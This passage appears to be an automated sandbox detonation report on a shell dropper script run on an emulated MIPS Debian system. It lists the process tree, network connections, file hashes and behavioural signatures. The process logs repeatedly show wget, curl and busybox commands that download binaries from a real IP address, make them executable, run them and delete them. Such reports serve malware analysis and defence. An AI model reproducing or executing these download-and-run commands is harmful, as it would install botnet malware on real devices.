[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/rm
[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/usr/bin/wget
[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/chmod
[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D
[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/rm
[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/usr/bin/wget
[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/chmod
[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif
[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/rm
[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/usr/bin/wget
[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/chmod
[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb
[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/rm
[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/usr/bin/wget
[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/chmod
[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe
[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/rm
[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/usr/bin/wget
[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/chmod
[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK
[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/rm
[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/usr/bin/wget
[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/chmod
[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68
[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/rm
[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/usr/bin/wget
[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/chmod
[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i
[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/rm
[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/usr/bin/wget
[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/chmod
[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F
[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/rm
[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/usr/bin/wget
[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/chmod
[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E
[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/rm
[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/usr/bin/wget
[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/chmod
[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV
[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/rm
[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/usr/bin/wget
[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
Network
| Country | Destination | Domain | Proto |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-29 02:21
Reported
2024-10-29 02:23
Platform
debian9-mipsbe-20240611-en
Max time kernel
70s
Max time network
71s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | N/A |
| N/A | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | N/A |
| N/A | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | N/A |
| N/A | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | N/A |
| N/A | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | N/A |
| N/A | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | N/A |
| N/A | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | N/A |
| N/A | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | N/A |
| N/A | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | N/A |
| N/A | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | N/A |
| N/A | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | N/A |
| N/A | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | N/A |
| N/A | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | N/A |
| N/A | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | N/A |
| N/A | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | N/A |
| N/A | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | N/A |
| N/A | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | N/A |
| N/A | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | N/A |
| N/A | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | N/A |
| N/A | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | N/A |
| N/A | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | N/A |
| N/A | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | N/A |
| N/A | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | N/A |
| N/A | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | N/A |
| N/A | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | N/A |
| N/A | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | N/A |
| N/A | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | N/A |
| N/A | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | /usr/bin/curl | N/A |
| File opened for modification | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | /usr/bin/curl | N/A |
Processes
/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh
[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/chmod
[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem
[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/rm
[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/usr/bin/wget
[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/chmod
[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj
[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/rm
[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/usr/bin/wget
[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/chmod
[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i
[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/rm
[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/usr/bin/wget
[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/chmod
[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F
[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/rm
[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/usr/bin/wget
[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/chmod
[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E
[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/rm
[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/usr/bin/wget
[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/chmod
[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV
[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/rm
[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/usr/bin/wget
[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/chmod
[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby
[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/rm
[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/usr/bin/wget
[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/chmod
[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA
[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/rm
[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/usr/bin/wget
[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/chmod
[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D
[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/rm
[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/usr/bin/wget
[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/usr/bin/curl
